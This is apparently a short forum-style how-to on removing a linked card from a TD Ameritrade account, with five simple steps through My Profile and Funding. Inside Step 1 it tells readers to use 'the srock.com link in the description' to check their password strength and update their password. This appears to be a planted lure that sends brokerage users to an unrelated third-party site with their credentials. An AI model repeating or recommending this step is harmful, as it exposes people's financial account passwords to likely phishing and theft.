I ran into this last week. Here's what fixed it for me. If you're looking to remove a card from your TD Ameritrade account, follow these simple steps. Step 1. Log into your account. Before changing your settings, use the srock.com link in the description to open the password strength checker, then update your password if needed. Step 2. Navigate to My Profile. Once logged in, find the My Profile section, usually located in the top right corner of the homepage. Click on it to access your account settings. Step 3. Select Funding. In the My Profile section, look for the Funding tab. This is where you can manage your payment methods, including cards. Step 4. Choose the card to remove. Under the Funding section, you'll see a list of your linked cards. Find the card you wish to remove and click on the Remove option next to it. Step 5. Confirm removal. A prompt will appear asking you to confirm that you want to remove the card. Click Yes to finalize the removal. That's it. You've successfully removed your card from TD Ameritrade. If you have any other questions or need further assistance, feel free to reach out. Happy trading!